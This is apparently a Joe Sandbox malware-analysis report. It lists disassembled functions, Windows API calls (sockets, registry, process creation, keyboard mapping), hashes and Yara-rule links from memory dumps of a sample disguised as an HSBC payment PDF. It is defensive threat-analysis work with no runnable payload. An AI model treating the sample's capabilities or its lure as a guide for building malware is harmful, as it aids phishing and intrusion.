Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A

Function 009D712C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,009D78A1,?,00000000,?,00000000,00000000), ref: 009D716E
__fassign.LIBCMT ref: 009D71E9
__fassign.LIBCMT ref: 009D7204
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 009D722A
WriteFile.KERNEL32(?,?,00000000,009D78A1,00000000,?,?,?,?,?,?,?,?,?,009D78A1,?), ref: 009D7249
WriteFile.KERNEL32(?,?,00000001,009D78A1,00000000,?,?,?,?,?,?,?,?,?,009D78A1,?), ref: 009D7282

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: da687016a35dd8e2a1bb5a05d134325cdcbf6bb737d1f9eb28945a27cba22cec
Instruction ID: 8c821440aa4ac1384b6ea5bf4b25578e4cf494a2974b80c3dcd19507c8e4e929
Opcode Fuzzy Hash: da687016a35dd8e2a1bb5a05d134325cdcbf6bb737d1f9eb28945a27cba22cec
Instruction Fuzzy Hash: 31519171A482499FCB10CFA8DC85AEEFBB8EF59300F14855BE555E7391E7309980CB60

Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
GetWindowLongW.USER32(00A61630,000000F0), ref: 0048631F
GetWindowLongW.USER32(00A61630,000000F0), ref: 00486354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59

Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
WSAGetLastError.WSOCK32(00000000), ref: 004761D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
connect.WSOCK32(00000000,?,00000010), ref: 00476217
WSAGetLastError.WSOCK32 ref: 00476221
closesocket.WSOCK32(00000000), ref: 0047624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65

Function 009D27A6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009D276A: _free.LIBCMT ref: 009D2793

_free.LIBCMT ref: 009D27F4

Part of subcall function 009D1626: HeapFree.KERNEL32(00000000,00000000,?,009D2798,?,00000000,?,00000000,?,009D27BF,?,00000007,?,?,009D1C27,?), ref: 009D163C
Part of subcall function 009D1626: GetLastError.KERNEL32(?,?,009D2798,?,00000000,?,00000000,?,009D27BF,?,00000007,?,?,009D1C27,?,?), ref: 009D164E

_free.LIBCMT ref: 009D27FF
_free.LIBCMT ref: 009D280A
_free.LIBCMT ref: 009D285E
_free.LIBCMT ref: 009D2869
_free.LIBCMT ref: 009D2874
_free.LIBCMT ref: 009D287F

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
Instruction ID: 4f05df33bd76ee9a61ed7304958d222dfcb9cfb05fb0ba62b5ed1df82c5b9b0d
Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
Instruction Fuzzy Hash: 77119332DC0B04BAD770BBB0CD07FCB779CAF94741F848826BA99A6252DA34F9044750

Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
GetProcAddress.KERNEL32(00000000), ref: 0042408C
EncodePointer.KERNEL32(00000000), ref: 00424097
DecodePointer.KERNEL32(00423F85), ref: 004240B2

Strings

RoUninitialize, xrefs: 00424074
combase.dll, xrefs: 00424080

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C

Function 009D3A79 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,009D3CCA,?,?,00000000), ref: 009D3AD3
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,009D3CCA,?,?,00000000,?,?,?), ref: 009D3B59
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009D3C53
__freea.LIBCMT ref: 009D3C60

Part of subcall function 009D288A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 009D28BC

__freea.LIBCMT ref: 009D3C69
__freea.LIBCMT ref: 009D3C8E

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 68ae9f87cde02ecf06dc54ed482c938d3527f8aaebb35f6d8c32b694d94948ec
Instruction ID: 569756d99a18d21cc4808695ae39088c7d885288b0b9bc2937af135febbda24c
Opcode Fuzzy Hash: 68ae9f87cde02ecf06dc54ed482c938d3527f8aaebb35f6d8c32b694d94948ec
Instruction Fuzzy Hash: 1851D372AA0216ABDB258F74CC81FBB77A9DB90751F14C62BFC04E6250EB34DE40D651

Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0046660B
_memmove.LIBCMT ref: 00466546

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

_memmove.LIBCMT ref: 004665B9
_memmove.LIBCMT ref: 004666A0
_memmove.LIBCMT ref: 004666B9
_memmove.LIBCMT ref: 004666D5

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 31b6c2821ee95968e36053ace308b28e5e0a31ebdb0f388184579a3ae126733f
Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
Opcode Fuzzy Hash: 31b6c2821ee95968e36053ace308b28e5e0a31ebdb0f388184579a3ae126733f
Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A

Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
RegCloseKey.ADVAPI32(00000000), ref: 00480399

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 3a69bb563f7b8a3e4012be6cf6d288248e8626f982930bec9f4d163de4be7317
Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
Opcode Fuzzy Hash: 3a69bb563f7b8a3e4012be6cf6d288248e8626f982930bec9f4d163de4be7317
Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56

Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045EF06
VariantClear.OLEAUT32(00000013), ref: 0045EF78
VariantClear.OLEAUT32(00000000), ref: 0045EFD3
_memmove.LIBCMT ref: 0045EFFD
VariantClear.OLEAUT32(?), ref: 0045F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94

Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
IsMenu.USER32(00000000), ref: 004622C3
CreatePopupMenu.USER32 ref: 004622F7
GetMenuItemCount.USER32(000000FF), ref: 00462355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B

Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6

GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
HeapAlloc.KERNEL32(00000000), ref: 004588DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
HeapFree.KERNEL32(00000000), ref: 00458911

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69

Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
CloseHandle.KERNEL32(00000004), ref: 00458603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64

Function 009D0DEB Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,009CF347), ref: 009D0DEF
_free.LIBCMT ref: 009D0E22
_free.LIBCMT ref: 009D0E4A
SetLastError.KERNEL32(00000000), ref: 009D0E57
SetLastError.KERNEL32(00000000), ref: 009D0E63
_abort.LIBCMT ref: 009D0E69

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 944d0a6ec6470adfc27e6e37390a29bd7242e40b09948d1b0b21e431a4c9a0eb
Instruction ID: 51dd3899fbe53dc4209e24527d94094c5db70990ce708140058656a06e398ea0
Opcode Fuzzy Hash: 944d0a6ec6470adfc27e6e37390a29bd7242e40b09948d1b0b21e431a4c9a0eb
Instruction Fuzzy Hash: 19F0FF375C8A0177C7123774BC0AB2B236D8BC2761F69CD1BF908963A2EE648C015270

Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5

Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
UnloadUserProfile.USERENV(?,?), ref: 004589A9
CloseHandle.KERNEL32(?), ref: 004589B2
CloseHandle.KERNEL32(?), ref: 004589BA
GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
HeapFree.KERNEL32(00000000), ref: 004589CA

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

